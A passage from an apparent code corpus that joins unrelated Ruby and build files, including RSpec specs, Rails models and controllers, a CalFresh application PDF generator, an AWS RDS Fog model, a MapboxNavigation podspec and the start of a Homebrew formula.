create(:comment, commentable_id: mentor_application.id, commentable_type: 'Application', user: mentor)
expect(subject).to be_a_new(Mentor::Comment)
end
end
describe '#mentor_fav!' do
let(:application) { create(:application) }
subject { m_application.mentor_fav! }
shared_examples :a_mentor_fav do |choice|
let(:other) { (choice % 2) + 1 }
it 'adds a fav for the chosen project to the persisted application record' do
expect { subject }
.to change { application.reload.data.send("mentor_fav_project#{choice}") }
.from(nil).to('true')
end
it 'does not change the mentor_fav for the other project' do
expect { subject }
.not_to change { application.reload.data.send("mentor_fav_project#{other}") }
end
end
context 'when project 1st choice' do
let(:m_application) { described_class.new(id: application.id, choice: 1) }
include_examples :a_mentor_fav, 1
end
context 'when project 2nd choice' do
let(:m_application) { described_class.new(id: application.id, choice: 2) }
include_examples :a_mentor_fav, 2
end
end
describe '#revoke_mentor_fav!' do
let(:application) do
create(:application,
application_data: {
'mentor_fav_project1': 'true',
'mentor_fav_project2': 'true'
}
)
end
subject { m_application.revoke_mentor_fav! }
shared_examples :a_mentor_fav do |choice|
let(:other) { (choice % 2) + 1 }
it 'removes the fav for the chosen project' do
expect { subject }
.to change { application.reload.application_data["mentor_fav_project#{choice}"] }
.from('true').to(nil)
end
it 'does not change the mentor_fav for the other project' do
expect { subject }
.not_to change { application.reload.data.send("mentor_fav_project#{other}") }
end
end
context 'when project 1st choice' do
let(:m_application) { described_class.new(id: application.id, choice: 1) }
include_examples :a_mentor_fav, 1
end
context 'when project 2nd choice' do
let(:m_application) { described_class.new(id: application.id, choice: 2) }
include_examples :a_mentor_fav, 2
end
end
describe '#sign_off!' do
let(:application) { create(:application) }
let(:mentor) { create(:mentor) }
def keys_for(choice)
["signed_off_at_project#{choice}", "signed_off_by_project#{choice}"]
end
subject { m_application.sign_off!(as: mentor) }
shared_examples :a_mentor_sign_off do |choice|
let(:other) { (choice % 2) + 1 }
let(:now) { Time.now.utc.to_s }
before { Timecop.freeze(now) }
after { Timecop.return }
it 'adds the signoff time and user id to the application' do
expect { subject }
.to change { application.reload.application_data.values_at(*keys_for(choice)) }
.from([nil, nil])
.to contain_exactly(now, mentor.id.to_s)
end
it 'does not change the signoff for the other project' do
expect { subject }
.not_to change { application.reload.application_data.values_at(*keys_for(other)) }
end
end
context 'when project 1st choice' do
let(:m_application) { described_class.new(id: application.id, choice: 1) }
include_examples :a_mentor_sign_off, 1
end
context 'when project 2nd choice' do
let(:m_application) { described_class.new(id: application.id, choice: 2) }
include_examples :a_mentor_sign_off, 2
end
end
describe '#revoke_sign_off!' do
let(:application) { create(:application, application_data: data) }
let(:mentor) { create(:mentor) }
let(:data) do
{
signed_off_at_project1: Time.now.utc.to_s,
signed_off_by_project1: mentor.id.to_s,
signed_off_at_project2: Time.now.utc.to_s,
signed_off_by_project2: '99'
}
end
def keys_for(choice)
["signed_off_at_project#{choice}", "signed_off_by_project#{choice}"]
end
subject { m_application.revoke_sign_off! }
shared_examples :a_mentor_sign_off do |choice|
let(:other) { (choice % 2) + 1 }
it 'sets the signoff time and user id to nil' do
expect { subject }
.to change { application.reload.application_data.values_at(*keys_for(choice)) }
.to([nil, nil])
end
it 'does not change the signoff for the other project' do
expect { subject }
.not_to change { application.reload.application_data.values_at(*keys_for(other)) }
end
end
context 'when project 1st choice' do
let(:m_application) { described_class.new(id: application.id, choice: 1) }
include_examples :a_mentor_sign_off, 1
end
context 'when project 2nd choice' do
let(:m_application) { described_class.new(id: application.id, choice: 2) }
include_examples :a_mentor_sign_off, 2
end
end
describe '#signed_off?' do
it 'returns true if signed_off_at was set' do
application = described_class.new(signed_off_at: Time.now.utc.to_s)
expect(application).to be_signed_off
end
it 'returns false if signed_off_at was not set' do
application = described_class.new
      expect(application).not_to be_signed_off
end
end
describe '#mentor_fav?' do
it 'returns true if mentor_fav was set' do
application = described_class.new(mentor_fav: 'true')
expect(application).to be_mentor_fav
end
it 'returns false if mentor_fav was not set' do
application = described_class.new
      expect(application).not_to be_mentor_fav
end
end
describe '#to_param' do
it 'returns the underlying active record id' do
subject.id = 4711
expect(subject.to_param).to eql '4711'
end
end
end
| 36.05303 | 128 | 0.658822 |
7adbd1f526bcc96a09d57b6f185fbb48f0051325 | 585 | # frozen_string_literal: true
require 'ffaker'
FactoryBot.define do
factory :team_passage_template do
team
    pool_type_id { ((rand * 10) % 2).to_i + 1 } # ASSERT: 25 and 50 meter pool types should exist
event_type_id do
EventsByPoolType.only_for_meetings
.for_pool_type_code(pool_type_id == 1 ? '25' : '50')
.min { rand - 0.5 }
.event_type_id
end
passage_type { PassageType.all.min { rand - 0.5 } }
end
#-- -------------------------------------------------------------------------
#++
end
| 29.25 | 93 | 0.509402 |
87d60e7ac586f9cae2d01e8fd4a85293a08ac67a | 405 | # frozen_string_literal: true
# Controller for Over Morgens fabulous Energy Mix infographic
class EnergyMixController < ApplicationController
layout 'energy_mix'
def show
@scenario = Api::Scenario.find(params[:id])
@saved_scenario = SavedScenario.find_by(scenario_id: @scenario.id)
rescue ActiveResource::ResourceNotFound
# No such scenario.
render_not_found('scenario')
end
end
| 27 | 70 | 0.767901 |
6a2461d3c0672efaf13138a48efc008e66d971f6 | 5,987 | module Calfresh
FORM_FIELDS = { name: 'Text1 PG 1', \
name_page3: 'Text3 PG 3', \
home_address: 'Text4 PG 1', \
home_city: 'Text5 PG 1', \
home_state: 'Text6 PG 1', \
home_zip_code: 'Text7 PG 1', \
date: 'Text32 PG 1', \
home_phone_number: 'Text12 PG 1', \
email: 'Text13 PG 1', \
date_of_birth: 'Text5 PG 3', \
sex: 'Text6 PG 3', \
ssn: 'Text3 PG 1', \
ssn_page3: 'Text9 PG 3', \
language_preference_reading: 'Text19 PG 1', \
language_preference_writing: 'Text20 PG 1',
addlhh_1_name: "Text12 PG 3",
addlhh_1_date_of_birth: "Text14 PG 3",
addlhh_1_sex: "Text15 PG 3",
addlhh_1_ssn: "Text18 PG 3",
addlhh_2_name: "Text21 PG 3",
addlhh_2_date_of_birth: "Text23 PG 3",
addlhh_2_sex: "Text24 PG 3",
addlhh_2_ssn: "Text27 PG 3",
addlhh_3_name: "Text30 PG 3",
addlhh_3_date_of_birth: "Text32 PG 3",
addlhh_3_sex: "Text33 PG 3",
addlhh_3_ssn: "Text36 PG 3",
addlhh_4_name: "Text39 PG 3",
addlhh_4_date_of_birth: "Text41 PG 3",
addlhh_4_sex: "Text42 PG 3",
addlhh_4_ssn: "Text45 PG 3",
interview_monday: 'Check Box47 PG 2',
interview_tuesday: 'Check Box48 PG 2',
interview_wednesday: 'Check Box49 PG 2',
interview_thursday: 'Check Box50 PG 2',
interview_friday: 'Check Box51 PG 2',
interview_early_morning: 'Check Box52 PG 2',
interview_mid_morning: 'Check Box53 PG 2',
interview_afternoon: 'Check Box54 PG 2',
interview_late_afternoon: 'Check Box55 PG 2',
signature: 'signature'
}
class ApplicationWriter
def initialize
@pdftk = PdfForms.new('pdftk')
end
def fill_out_form(input)
symbolized_key_input = symbolize_keys(input)
symbolized_key_input_with_addlhhs = process_addl_hh_members(symbolized_key_input)
validated_field_input = filter_input_for_valid_fields(symbolized_key_input_with_addlhhs)
input_for_pdf_writer = map_input_to_pdf_field_names(validated_field_input)
input_for_pdf_writer[FORM_FIELDS[:date]] = Time.zone.today.strftime("%m/%d/%Y")
input_for_pdf_writer['Check Box1 PG 3'] = "Yes"
if symbolized_key_input[:medi_cal_interest] == "on"
input_for_pdf_writer['Check Box24 PG 1'] = "Yes"
end
unique_key = SecureRandom.hex
# Fill in CF-285 to file: filled_in_form_path
# TO DO: Add e-sig to CF-285
filled_in_form_path = "/tmp/application_#{unique_key}.pdf"
empty_form_path = File.expand_path("../calfresh/calfresh_3pager.pdf", __FILE__)
@pdftk.fill_form(empty_form_path, filled_in_form_path, input_for_pdf_writer)
# Add cover page to file: path_for_app_without_info_release_form
path_for_app_without_info_release_form = "/tmp/final_application_without_info_release_#{unique_key}.pdf"
cover_letter_path = File.expand_path("../calfresh/cover_letter_v5.pdf", __FILE__)
system("pdftk #{cover_letter_path} #{filled_in_form_path} cat output #{path_for_app_without_info_release_form}")
# Add ROI form
# TO DO: Add e-sig to ROI form
path_for_info_release_form = "/tmp/info_release_form_#{unique_key}.pdf"
info_release_form = InfoReleaseForm.new(client_information: validated_field_input, path_for_pdf: path_for_info_release_form)
system("pdftk #{path_for_app_without_info_release_form} #{path_for_info_release_form} cat output /tmp/final_application_#{unique_key}.pdf")
Application.new(unique_key)
end
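    # A hedged usage sketch (field values are hypothetical; see FORM_FIELDS for
    # the accepted keys):
    #
    #   writer = Calfresh::ApplicationWriter.new
    #   app = writer.fill_out_form(
    #     'name' => 'Jane Doe',
    #     'date_of_birth' => '01/01/1980',
    #     'signature' => 'Jane Doe',
    #     'medi_cal_interest' => 'on'
    #   )
    #   app.final_pdf_path # => "/tmp/final_application_<unique_key>.pdf"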
def process_addl_hh_members(input)
if input[:additional_household_members] != nil
new_input = input
input[:additional_household_members].each_with_index do |person_hash, array_index|
index_starting_at_one = array_index + 1
person_hash.each do |key, value|
new_input["addlhh_#{index_starting_at_one}_#{key}".to_sym] = value
end
end
return new_input
else
return input
end
end
#private
def filter_input_for_valid_fields(form_input_hash)
form_input_hash.select do |human_readable_field_name, value|
FORM_FIELDS.has_key?(human_readable_field_name)
end
end
def map_input_to_pdf_field_names(form_input)
new_hash = Hash.new
form_input.each do |human_readable_field_name, value|
new_hash[FORM_FIELDS[human_readable_field_name]] = value
end
new_hash
end
def symbolize_keys(hash)
symbolized_hash = Hash.new
hash.each { |key,value| symbolized_hash[key.to_sym] = value }
symbolized_hash
end
end
class Application
attr_reader :unique_key
def initialize(unique_key)
@unique_key = unique_key
end
def final_pdf_path
"/tmp/final_application_#{unique_key}.pdf"
end
end
class InfoReleaseForm
def initialize(params)
name = params[:client_information][:name]
signature = params[:client_information][:signature]
date_today = Time.zone.today.strftime("%m/%d/%Y")
pdf = Prawn::Document.new
pdf.font 'Helvetica'
pdf.font('Helvetica', style: :bold) do
pdf.text 'Subject: Authorization for release of information'
pdf.text 'To: San Francisco Human Services Agency'
end
pdf.move_down 10
pdf.text(<<EOF
I, #{name}, authorize you to release the following information regarding my CalFresh application or active case to Code for America:
- Case number
- Current and past application status
- Dates and reasons for all changes to the application status
- Current and past benefit allotment
- Reasons my case was pended or denied
- Description of all verification documents that were submitted
Code for America will use this information to make sure my case is processed properly.
Electronic signature: #{signature}
Date: #{date_today}
___________________________________
Code for America
155 9th Street, San Francisco 94103
(415) 625-9633
www.codeforamerica.org
EOF
)
pdf.render_file(params[:path_for_pdf])
end
end
end
| 35.426036 | 145 | 0.704694 |
18898c1f5a84b922b2bfc6ca5b4f5c215c8825a7 | 384 | module Highrise
class Person < Subject
include Pagination
include Taggable
def self.find_all_across_pages_since(time)
find_all_across_pages(:params => { :since => time.to_s(:db).gsub(/[^\d]/, '') })
end
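    # A hedged usage sketch (assumes ActiveSupport is loaded for `2.days.ago`):
    #
    #   Highrise::Person.find_all_across_pages_since(2.days.ago)
    #   # => every person updated in Highrise since that time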
def company
Company.find(company_id) if company_id
end
def name
"#{first_name} #{last_name}".strip
end
end
end | 19.2 | 86 | 0.619792 |
ffb6e13e97d56bca47e963b6777c11ef579712d7 | 34 | include_recipe "jupyter::default"
| 17 | 33 | 0.823529 |
7ab6092b226b05bf1423295c284e0fb8e8682032 | 250 | class CreateTestDbs < ActiveRecord::Migration
def change
create_table :test_dbs do |t|
t.integer :city_code
t.integer :cs
t.integer :count
t.integer :status
t.integer :user_id
t.timestamps
end
end
end
| 17.857143 | 45 | 0.64 |
1d8ce747f5b385edb8b0826c81fcbfff68831052 | 1,733 | # Copyright (c) 2007-2015, Evan Phoenix and contributors
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of Rubinius nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Only part of Rubinius' thread.rb
class Thread
def self.stop
sleep
nil
end
def self.exit
Thread.current.kill
end
def self.kill(thread)
thread.kill
end
end
| 38.511111 | 80 | 0.773226 |
abe98d59d3f3939a5139bd77b85e096097ee3dde | 7,864 | module Fog
module AWS
class RDS
class Server < Fog::Model
identity :id, :aliases => 'DBInstanceIdentifier'
attribute :allocated_storage, :aliases => 'AllocatedStorage', :type => :integer
attribute :auto_minor_version_upgrade, :aliases => 'AutoMinorVersionUpgrade'
attribute :availability_zone, :aliases => 'AvailabilityZone'
attribute :backup_retention_period, :aliases => 'BackupRetentionPeriod', :type => :integer
attribute :ca_certificate_id, :aliases => 'CACertificateIdentifier'
attribute :character_set_name, :aliases => 'CharacterSetName'
attribute :cluster_id, :aliases => 'DBClusterIdentifier'
attribute :created_at, :aliases => 'InstanceCreateTime', :type => :time
attribute :db_name, :aliases => 'DBName'
attribute :db_parameter_groups, :aliases => 'DBParameterGroups'
attribute :db_security_groups, :aliases => 'DBSecurityGroups', :type => :array
attribute :db_subnet_group_name, :aliases => 'DBSubnetGroupName'
attribute :dbi_resource_id, :aliases => 'DbiResourceId'
attribute :endpoint, :aliases => 'Endpoint'
attribute :engine, :aliases => 'Engine'
attribute :engine_version, :aliases => 'EngineVersion'
attribute :flavor_id, :aliases => 'DBInstanceClass'
attribute :iops, :aliases => 'Iops', :type => :integer
attribute :kms_key_id, :aliases => 'KmsKeyId'
attribute :last_restorable_time, :aliases => 'LatestRestorableTime', :type => :time
attribute :license_model, :aliases => 'LicenseModel'
attribute :master_username, :aliases => 'MasterUsername'
attribute :multi_az, :aliases => 'MultiAZ', :type => :boolean
attribute :pending_modified_values, :aliases => 'PendingModifiedValues'
attribute :preferred_backup_window, :aliases => 'PreferredBackupWindow'
attribute :preferred_maintenance_window, :aliases => 'PreferredMaintenanceWindow'
attribute :publicly_accessible, :aliases => 'PubliclyAccessible'
attribute :read_replica_identifiers, :aliases => 'ReadReplicaDBInstanceIdentifiers', :type => :array
attribute :read_replica_source, :aliases => 'ReadReplicaSourceDBInstanceIdentifier'
attribute :state, :aliases => 'DBInstanceStatus'
attribute :storage_encrypted, :aliases => 'StorageEncrypted', :type => :boolean
attribute :storage_type, :aliases => 'StorageType'
attribute :tde_credential_arn, :aliases => 'TdeCredentialArn'
attribute :vpc_security_groups, :aliases => 'VpcSecurityGroups', :type => :array
attr_accessor :password, :parameter_group_name, :security_group_names, :port, :source_snapshot_id
def cluster
return nil unless cluster_id
service.clusters.get(cluster_id)
end
def create_read_replica(replica_id, options={})
options[:security_group_names] ||= options['DBSecurityGroups']
params = self.class.new(options).attributes_to_params
service.create_db_instance_read_replica(replica_id, id, params)
service.servers.get(replica_id)
end
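        # A hedged usage sketch (identifiers are hypothetical):
        #
        #   primary = rds.servers.get('my-primary-db')
        #   replica = primary.create_read_replica('my-primary-db-replica',
        #                                         flavor_id: 'db.m1.small')
        #   replica.state # => "creating"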
def ready?
state == 'available'
end
def destroy(snapshot_identifier=nil)
requires :id
service.delete_db_instance(id, snapshot_identifier, snapshot_identifier.nil?)
true
end
def reboot
service.reboot_db_instance(id)
true
end
def snapshots
requires :id
service.snapshots(:server => self)
end
def tags
requires :id
service.list_tags_for_resource(id).
body['ListTagsForResourceResult']['TagList']
end
def add_tags(new_tags)
requires :id
service.add_tags_to_resource(id, new_tags)
tags
end
def remove_tags(tag_keys)
requires :id
service.remove_tags_from_resource(id, tag_keys)
tags
end
def promote_read_replica
requires :id
data = service.promote_read_replica(id).body["PromoteReadReplicaResult"]["DBInstance"]
merge_attributes(data)
end
alias promote promote_read_replica
def modify(immediately, options)
options[:security_group_names] ||= options['DBSecurityGroups']
params = self.class.new(options).attributes_to_params
data = service.modify_db_instance(id, immediately, params)
merge_attributes(data.body['ModifyDBInstanceResult']['DBInstance'])
true
end
def save
if source_snapshot_id
requires :id
data = service.restore_db_instance_from_db_snapshot(source_snapshot_id, id, attributes_to_params)
merge_attributes(data.body['RestoreDBInstanceFromDBSnapshotResult']['DBInstance'])
else
requires :engine
if engine == 'aurora'
requires :cluster_id
self.flavor_id ||= 'db.r3.large'
else
requires :master_username
requires :password
requires :allocated_storage
self.flavor_id ||= 'db.m1.small'
end
data = service.create_db_instance(id, attributes_to_params)
merge_attributes(data.body['CreateDBInstanceResult']['DBInstance'])
true
end
end
# Converts attributes to a parameter hash suitable for requests
def attributes_to_params
options = {
'AllocatedStorage' => allocated_storage,
'AutoMinorVersionUpgrade' => auto_minor_version_upgrade,
'AvailabilityZone' => availability_zone,
'BackupRetentionPeriod' => backup_retention_period,
'DBClusterIdentifier' => cluster_id,
'DBInstanceClass' => flavor_id,
'DBInstanceIdentifier' => id,
'DBName' => db_name,
'DBParameterGroupName' => parameter_group_name || attributes['DBParameterGroupName'],
'DBSecurityGroups' => security_group_names,
'DBSubnetGroupName' => db_subnet_group_name,
'Engine' => engine,
'EngineVersion' => engine_version,
'Iops' => iops,
'KmsKeyId' => kms_key_id,
'LicenseModel' => license_model,
'MasterUserPassword' => password || attributes['MasterUserPassword'],
'MasterUsername' => master_username,
'MultiAZ' => multi_az,
'Port' => port || attributes['Port'],
'PreferredBackupWindow' => preferred_backup_window,
'PreferredMaintenanceWindow' => preferred_maintenance_window,
'PubliclyAccessible' => publicly_accessible,
'StorageEncrypted' => storage_encrypted,
'StorageType' => storage_type,
'VpcSecurityGroups' => vpc_security_groups,
}
options.delete_if {|key, value| value.nil?}
end
end
end
end
end
| 45.456647 | 112 | 0.570448 |
ffaaf73ba121afa4bf083511f01f1f0696c99c19 | 3,078 | Pod::Spec.new do |s|
# ――― Spec Metadata ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
s.name = "MapboxNavigation-Documentation"
s.version = '1.3.0'
s.summary = "Complete turn-by-turn navigation interface for iOS."
s.description = <<-DESC
The Mapbox Navigation SDK for iOS is a drop-in interface for turn-by-turn navigation along a route, complete with a well-designed map and easy-to-understand spoken directions. Routes are powered by Mapbox Directions.
DESC
s.homepage = "https://docs.mapbox.com/ios/navigation/"
s.documentation_url = "https://docs.mapbox.com/ios/api/navigation/"
# ――― Spec License ――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
s.license = { :type => "ISC", :file => "LICENSE.md" }
# ――― Author Metadata ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
s.author = { "Mapbox" => "[email protected]" }
s.social_media_url = "https://twitter.com/mapbox"
# ――― Platform Specifics ――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
s.ios.deployment_target = "12.0"
# ――― Source Location ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
s.source = { :git => "https://github.com/mapbox/mapbox-navigation-ios.git", :tag => "v#{s.version.to_s}" }
# ――― Source Code ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
s.source_files = "Sources/{MapboxNavigation,MapboxCoreNavigation,CMapboxCoreNavigation/include}/**/*.{h,m,swift}"
# ――― Resources ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
s.resources = ['Sources/MapboxNavigation/Resources/*/*', 'Sources/MapboxNavigation/Resources/*']
# ――― Project Settings ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
s.requires_arc = true
s.module_name = "MapboxNavigation"
s.frameworks = ['CarPlay']
s.dependency "MapboxAccounts", "~> 2.3.0"
s.dependency "MapboxDirections", "~> 1.2.0"
s.dependency "MapboxGeocoder.swift", "~> 0.10.0"
s.dependency "Mapbox-iOS-SDK", "~> 6.0"
s.dependency "MapboxMobileEvents", "~> 0.10.2"
s.dependency "MapboxNavigationNative", "~> 31.0"
s.dependency "Solar", "~> 2.1"
s.dependency "Turf", "~> 1.0"
s.dependency "MapboxSpeech", "~> 1.0"
s.swift_version = "5.0"
# https://github.com/mapbox/mapbox-navigation-ios/issues/2665
s.user_target_xcconfig = {
'EXCLUDED_ARCHS[sdk=iphonesimulator*]' => '$(EXCLUDED_ARCHS__EFFECTIVE_PLATFORM_SUFFIX_$(EFFECTIVE_PLATFORM_SUFFIX)__NATIVE_ARCH_64_BIT_$(NATIVE_ARCH_64_BIT)__XCODE_$(XCODE_VERSION_MAJOR))',
'EXCLUDED_ARCHS__EFFECTIVE_PLATFORM_SUFFIX_simulator__NATIVE_ARCH_64_BIT_x86_64__XCODE_1200' => 'arm64 arm64e armv7 armv7s armv6 armv8'
}
s.pod_target_xcconfig = {
'EXCLUDED_ARCHS[sdk=iphonesimulator*]' => '$(EXCLUDED_ARCHS__EFFECTIVE_PLATFORM_SUFFIX_$(EFFECTIVE_PLATFORM_SUFFIX)__NATIVE_ARCH_64_BIT_$(NATIVE_ARCH_64_BIT)__XCODE_$(XCODE_VERSION_MAJOR))',
'EXCLUDED_ARCHS__EFFECTIVE_PLATFORM_SUFFIX_simulator__NATIVE_ARCH_64_BIT_x86_64__XCODE_1200' => 'arm64 arm64e armv7 armv7s armv6 armv8'
}
end
| 43.971429 | 218 | 0.598765 |
1a2d043177fe0dcf9f2e4f44f11cffc5171c19cb | 863 |
Given /^I have input file\(s\) named "(.*?)"$/ do |arg1|
@filenames = arg1.split(/,/)
end
When /^I execute "(.*?)"$/ do |arg1|
@cmd = arg1 + ' < ' + @filenames[0]
end
Then(/^I expect the named output to match the named output "(.*?)"$/) do |arg1|
RegressionTest::CliExec::exec(@cmd,arg1,ignore: '(##BioVcf|date|"version":)').should be_truthy
end
Then(/^I expect the named output to match the named output "([^"]*)" in under (\d+) seconds$/) do |arg1, arg2|
RegressionTest::CliExec::exec(@cmd,arg1,ignore: '(##BioVcf|date|"version":)',timeout: arg2.to_i).should be_truthy
end
Then(/^I expect an error and the named output to match the named output "(.*?)" in under (\d+) seconds$/) do |arg1,arg2|
RegressionTest::CliExec::exec(@cmd,arg1,ignore: '(FATAL|Waiting|from|vcf|Options|Final pid)',should_fail: true,timeout:arg2.to_i).should be_truthy
end
| 39.227273 | 148 | 0.66628 |
1abe047ee30d1dcc5a865d97be495b52d4842721 | 2,072 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended to check this file into your version control system.
ActiveRecord::Schema.define(:version => 20160212213438) do
create_table "resource_as", :force => true do |t|
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
t.integer "parent_id"
t.integer "master_id"
t.integer "leader_id"
t.string "explicit_attr"
t.string "implicit_attr"
t.string "custom_attr"
t.string "nested_accessor"
t.string "dynamic_accessor"
t.string "private_accessor"
t.string "aliased_accessor"
t.string "from_accessor"
t.string "to_accessor"
t.string "compound_accessor"
t.string "nested_compound_accessor"
t.string "unexposed_attr"
end
create_table "resource_bs", :force => true do |t|
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
t.integer "other_id"
t.integer "extra_id"
t.string "explicit_attr"
t.string "implicit_attr"
t.string "custom_attr"
t.string "nested_accessor"
t.string "dynamic_accessor"
t.string "private_accessor"
t.string "aliased_accessor"
t.string "from_accessor"
t.string "to_accessor"
t.string "compound_accessor"
t.string "nested_compound_accessor"
t.string "unexposed_attr"
end
end
| 37 | 86 | 0.688707 |
d5410cdd6a4298bbf9b42788a5fc34a84a434981 | 5,260 | module UnitTests
module Matchers
def match_against(object)
MatchAgainstMatcher.new(object)
end
class MatchAgainstMatcher
DIVIDER = ('-' * Shoulda::Matchers::WordWrap::TERMINAL_WIDTH).freeze
attr_reader :failure_message, :failure_message_when_negated
def initialize(object)
@object = object
@failure_message = nil
@failure_message_when_negated = nil
@should_be_negated = nil
end
def and_fail_with(message, wrap: false)
@expected_message =
if wrap
Shoulda::Matchers.word_wrap(message.strip_heredoc.strip)
else
message.strip_heredoc.strip
end
@should_be_negated = true
self
end
def or_fail_with(message, wrap: false)
@expected_message =
if wrap
Shoulda::Matchers.word_wrap(message.strip_heredoc.strip)
else
message.strip_heredoc.strip
end
@should_be_negated = false
self
end
def matches?(generate_matcher)
@positive_matcher = generate_matcher.call
@negative_matcher = generate_matcher.call
if expected_message && should_be_negated?
raise ArgumentError.new(
'Use `or_fail_with`, not `and_fail_with`, when using '\
'`should match_against(...)`!',
)
end
if positive_matcher.matches?(object)
matcher_fails_in_negative?
else
@failure_message = <<-MESSAGE
Expected the matcher to match in the positive, but it failed with this message:
#{DIVIDER}
#{positive_matcher.failure_message}
#{DIVIDER}
MESSAGE
false
end
end
def does_not_match?(generate_matcher)
@positive_matcher = generate_matcher.call
@negative_matcher = generate_matcher.call
if expected_message && !should_be_negated?
raise ArgumentError.new(
'Use `and_fail_with`, not `or_fail_with`, when using '\
'`should_not match_against(...)`!',
)
end
if matcher_fails_in_positive?
if (
negative_matcher.respond_to?(:does_not_match?) &&
!negative_matcher.does_not_match?(object)
)
@failure_message_when_negated = <<-MESSAGE
Expected the matcher to match in the negative, but it failed with this message:
#{DIVIDER}
#{negative_matcher.failure_message_when_negated}
#{DIVIDER}
MESSAGE
false
else
true
end
end
end
def supports_block_expectations?
true
end
private
attr_reader(
:object,
:expected_message,
:positive_matcher,
:negative_matcher,
)
def should_be_negated?
@should_be_negated
end
def matcher_fails_in_negative?
if does_not_match_in_negative?
if (
!expected_message ||
expected_message == negative_matcher.failure_message_when_negated.strip
)
true
else
diff_result = diff(
expected_message,
negative_matcher.failure_message_when_negated.strip,
)
@failure_message = <<-MESSAGE
Expected the negative version of the matcher not to match and for the failure
message to be:
#{DIVIDER}
#{expected_message.chomp}
#{DIVIDER}
However, it was:
#{DIVIDER}
#{negative_matcher.failure_message_when_negated}
#{DIVIDER}
Diff:
#{Shoulda::Matchers::Util.indent(diff_result, 2)}
MESSAGE
false
end
else
@failure_message =
'Expected the negative version of the matcher not to match, '\
'but it did.'
false
end
end
def does_not_match_in_negative?
if negative_matcher.respond_to?(:does_not_match?)
!negative_matcher.does_not_match?(object)
else
# generate failure_message_when_negated
negative_matcher.matches?(object)
true
end
end
def matcher_fails_in_positive?
if !positive_matcher.matches?(object)
if (
!expected_message ||
expected_message == positive_matcher.failure_message.strip
)
true
else
diff_result = diff(
expected_message,
positive_matcher.failure_message.strip,
)
@failure_message_when_negated = <<-MESSAGE
Expected the positive version of the matcher not to match and for the failure
message to be:
#{DIVIDER}
#{expected_message.chomp}
#{DIVIDER}
However, it was:
#{DIVIDER}
#{positive_matcher.failure_message}
#{DIVIDER}
Diff:
#{Shoulda::Matchers::Util.indent(diff_result, 2)}
MESSAGE
false
end
else
@failure_message_when_negated =
'Expected the positive version of the matcher not to match, '\
'but it did.'
false
end
end
def diff(expected, actual)
differ.diff(expected, actual)[1..]
end
def differ
@_differ ||= RSpec::Support::Differ.new
end
end
end
end
| 24.239631 | 83 | 0.598289 |
33974720f970a7683264598f6041665f7848752e | 177 | class CreateLists < ActiveRecord::Migration[5.2]
def change
create_table :lists do |t|
t.string :name
t.string :category
t.timestamps
end
end
end
| 16.090909 | 48 | 0.644068 |
b9143c49a8c5df935a00a457fc5a9d008fde9470 | 857 | # Copyright 2008-2009 Amazon.com, Inc. or its affiliates. All Rights
# Reserved. Licensed under the Amazon Software License (the
# "License"). You may not use this file except in compliance with the
# License. A copy of the License is located at
# http://aws.amazon.com/asl or in the "license" file accompanying this
# file. This file is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See
# the License for the specific language governing permissions and
# limitations under the License.
module EC2
module Platform
module Base
class Architecture
I386 = 'i386'
X86_64 = 'x86_64'
UNKNOWN = 'unknown'
SUPPORTED = [I386, X86_64]
def self.supported? arch
SUPPORTED.include? arch
end
end
end
end
end
| 31.740741 | 70 | 0.677946 |
b90a28e18256954f63d50fca51032038beb4bbe4 | 1,184 | # No head build supported; if you need head builds of Mercurial, do so outside
# of Homebrew.
class Mercurial < Formula
desc "Scalable distributed version control system"
homepage "https://mercurial.selenic.com/"
url "https://mercurial.selenic.com/release/mercurial-3.4.1.tar.gz"
sha256 "7a8acf7329beda38ceea29c689212574d9a6bfffe24cf565015ea0066f7cee3f"
bottle do
cellar :any
sha256 "f038a255e43c177ae362f319d0cef3e42c1bf631418de78ee13165dc48d2b9ba" => :yosemite
sha256 "b9408e88838e05d57720735b95c8dc00efbf81f655846b29fb363895580a1daa" => :mavericks
sha256 "a0b7d3f952aae73b8b02aff8c82c41af458babddf9c1e01118676ec1139a734b" => :mountain_lion
end
def install
